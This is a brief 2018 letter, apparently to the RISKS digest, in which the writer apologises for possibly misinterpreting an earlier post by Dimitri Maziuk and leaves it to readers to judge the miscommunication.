Wed, 1 Aug 2018 21:14:17 -0400
I'm sorry if I misinterpreted what Dimitri Maziuk said a few issues ago.
Other followers of RISKS will need to review the entries and, as they see
fit, apportion fault between the transmission & reception functions in our
communication.

Reply to bob@fenichel.net
